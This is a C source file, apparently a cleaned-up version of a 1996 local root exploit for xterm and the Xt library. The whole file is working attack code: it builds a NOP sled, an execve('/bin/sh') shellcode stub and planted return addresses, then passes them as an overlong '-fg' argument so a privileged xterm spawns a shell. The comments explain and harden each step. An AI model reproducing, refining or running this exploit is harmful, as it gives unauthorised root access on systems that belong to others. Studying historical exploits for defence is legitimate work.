
# Title : Xt Library Local Root Command Execution Exploit (overlong xterm "-fg" argument; stack overflow on 32-bit x86)
# Published : 1996-08-24
# Author : b0z0 bra1n


#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET          0      /* added to the sampled stack pointer to form the planted return address (overridable via argv[1]) */
#define BUFFER_SIZE             1491   /* bytes of NOP sled + shellcode before the return-address slots (overridable via argv[2]) */

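/*
 * Sample the stack pointer at the point of the call.
 *
 * main() uses this value (plus an optional offset) as the return address it
 * plants after the NOP sled, so the exploit is only meaningful on 32-bit x86
 * where the victim's stack lies at a predictable distance from ours.
 * Returns the low 32 bits of %esp; on any other architecture the value is
 * not a usable address.
 */
long get_esp(void)
{
   unsigned int sp;

   /* Use an explicit output operand instead of relying on %eax happening to
    * be the return register with no return statement: that was undefined
    * behaviour and breaks as soon as the compiler optimises. */
   __asm__ volatile ("movl %%esp, %0" : "=r"(sp));
   return (long)sp;
}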

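/*
 * Parse a decimal integer argument into *out.
 * Returns 0 on success, -1 on empty/junk input or a value outside int range.
 * (atoi() silently returned 0 on garbage, which then drove buffer sizing.)
 */
static int parse_int(const char *s, int *out)
{
   char *end = NULL;
   long v;

   errno = 0;
   v = strtol(s, &end, 10);
   if (end == s || *end != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX)
      return -1;
   *out = (int)v;
   return 0;
}

/*
 * Build the malicious "-fg" argument and exec /usr/X11R6/bin/xterm with it.
 *
 * Argument layout (bs + 8 bytes, NUL terminated):
 *     [ NOP sled (0x90 ...) ][ shellcode ][ return address ][ return address ]
 * The return address is the stack pointer sampled by get_esp() plus an
 * optional offset (argv[1]); the sled+shellcode size bs defaults to
 * BUFFER_SIZE and can be overridden with argv[2].
 *
 * The payload travels through execl() as a C string, so it must not contain
 * a NUL byte anywhere before its end: the shellcode is NUL-free by design,
 * and the chosen return address is checked for NUL bytes before use.
 *
 * Returns 1 on bad arguments, an unusable size, allocation failure or if
 * execl() fails; on success it never returns.
 */
int main(int argc, char **argv)
{
   /* Appears to be the classic 32-bit BSD execve("/bin/sh") stub (lcall 7,0
    * gate, syscall 0x3b). It contains no NUL byte; the 0x01..0x04 runs stand
    * in for NULs that the stub writes over itself at run time. */
   static const char execshell[] =
      "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
      "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
      "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
      "\xeb\x18"
      "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
      "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
   enum { RET_SLOTS = 2, RET_SIZE = 4, ARG_CAP = 4096 };

   size_t shell_len = sizeof execshell - 1;   /* no embedded NUL, so == strlen() */
   int ofs = DEFAULT_OFFSET;
   int bs = BUFFER_SIZE;
   unsigned long ret;
   unsigned char ret_bytes[RET_SIZE];
   char *buff = NULL;
   char *p = NULL;
   int i;

   if (argc > 1 && parse_int(argv[1], &ofs) != 0) {
      fprintf(stderr, "bad offset: %s\n", argv[1]);
      return 1;
   }
   if (argc > 2 && parse_int(argv[2], &bs) != 0) {
      fprintf(stderr, "bad buffer size: %s\n", argv[2]);
      return 1;
   }

   /* The sled must have room for the shellcode, and sled + return slots +
    * terminating NUL must fit the fixed allocation. The original checked
    * neither: a small bs made memset()'s length wrap to a huge value and a
    * large bs overran the 4096-byte heap buffer. */
   if (bs < (int)shell_len || (size_t)bs + RET_SLOTS * RET_SIZE + 1 > ARG_CAP) {
      fprintf(stderr, "buffer size must be between %zu and %d\n",
              shell_len, (int)(ARG_CAP - RET_SLOTS * RET_SIZE - 1));
      return 1;
   }

   /* Sample the stack once so the printed address and the planted one agree. */
   ret = (unsigned long)(get_esp() + ofs);
   printf("Using offset of esp + %d (%lx)\nBuffer size %d\n", ofs, ret, bs);

   /* Little-endian 4-byte slot, as the i386 stack frame expects. Writing it
    * byte-wise avoids the misaligned long* store of the original and keeps
    * the slot 4 bytes wide even where long is 8 bytes. */
   for (i = 0; i < RET_SIZE; i++)
      ret_bytes[i] = (unsigned char)(ret >> (8 * i));
   if (memchr(ret_bytes, 0, RET_SIZE) != NULL)
      fprintf(stderr, "warning: return address %lx contains a NUL byte; "
                      "the argument will be cut short there - try another offset\n", ret);

   buff = malloc(ARG_CAP);
   if (!buff) {
      fprintf(stderr, "can't allocate memory\n");
      return 1;
   }

   p = buff;
   memset(p, 0x90, (size_t)bs - shell_len);   /* 0x90 = i386 NOP: any hit in the sled slides into the stub */
   p += (size_t)bs - shell_len;
   memcpy(p, execshell, shell_len);
   p += shell_len;
   for (i = 0; i < RET_SLOTS; i++) {
      memcpy(p, ret_bytes, RET_SIZE);
      p += RET_SIZE;
   }
   *p = '\0';

   execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, (char *)NULL);

   /* Only reached if the exec itself failed (no such binary, not executable ...). */
   perror("execl");
   free(buff);
   return 1;
}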

